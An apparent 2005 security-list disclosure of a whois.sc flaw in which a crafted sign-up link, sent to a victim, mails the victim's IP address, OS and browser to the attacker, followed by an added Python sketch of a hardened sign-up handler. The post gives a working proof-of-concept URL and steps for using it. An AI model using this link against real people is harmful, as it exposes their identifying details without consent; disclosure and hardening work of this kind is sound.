Message-ID: <b7a807650511030130p6b9e9aa5r3c3f78ecca49d8cd@mail.gmail.com>
Date: Thu Nov 3 11:09:38 2005
From: unknown.pentester at gmail.com (unknown unknown)
Subject: whois.sc not-big-deal hole (2nd post)

I just forgot to mention in the previous post that after the victim
clicks on the specially-crafted link, the attacker should be able to
receive an account sign-up email with the following information about
the victim (located at the bottom of the email body):

- IP Address
- Operating system version
- Web browser version

The bottom of the email looks like this (some information has been hidden):

---------------------------------------------------
NOTE: You received this message because someone from
X.X.X.X(Mozilla/X.X (Windows; U; Windows NT X.X; en-US; rv:X.X.X)
Gecko/2005XXXX Firefox/X.X.X)
requested an account for this email address. If you
did not request this account please ignore this message
and you will not be contacted again.
---------------------------------------------------

PoC:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40gmail.com

Replace "attacker%40gmail.com" in the previous link with your own
email address (e.g.: myself%40gmail.com) and send it to the victim.

Note: the only limitation of this "trick" is that the attacker needs
to use a different email address for each attack. This is because
whois.sc will set the account activation status to "pending" after
requesting the account activation for the first time.

Regards,
pagvac
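
Added example, not part of the original post and not whois.sc's code: a Python model of the sign-up action as the post describes it, next to a hardened form that refuses GET, requires a session-bound token and keeps the requester's IP and User-Agent out of the mail. The function names, the "csrf" parameter, SERVER_KEY and the audit log are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # assumed per-deployment secret


def csrf_token(session_id: str) -> str:
    """Token bound to the visitor's session; embedded in the real sign-up form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def signup_as_described(method, params, remote_ip, user_agent):
    """Behaviour the post describes: the HTTP method is not checked, so a plain
    link triggers the mail, and its footer carries the requester's IP and UA."""
    body = (
        "Confirm your account.\n"
        "NOTE: You received this message because someone from\n"
        f"{remote_ip}({user_agent})\n"
        "requested an account for this email address."
    )
    return 200, {"to": params["email"], "body": body}


def signup_hardened(method, params, session_id, remote_ip, user_agent, audit_log):
    """Same action with the two properties the leak depends on removed."""
    # 1. State-changing action: refuse GET so a bare link cannot trigger it.
    if method != "POST":
        return 405, None
    # 2. Require a token tied to the visitor's own session.
    supplied = params.get("csrf", "")
    if not hmac.compare_digest(supplied.encode(), csrf_token(session_id).encode()):
        return 403, None
    # 3. Keep requester metadata server-side; do not mail it to an address
    #    that the requester merely supplied as a parameter.
    audit_log.append({"email": params["email"], "ip": remote_ip, "ua": user_agent})
    body = ("Confirm your account.\n"
            "If you did not request this account please ignore this message.")
    return 200, {"to": params["email"], "body": body}
```

Either change on its own breaks the chain in the post: without GET handling the link does nothing when clicked, and without the footer the mail tells its recipient nothing about who made the request.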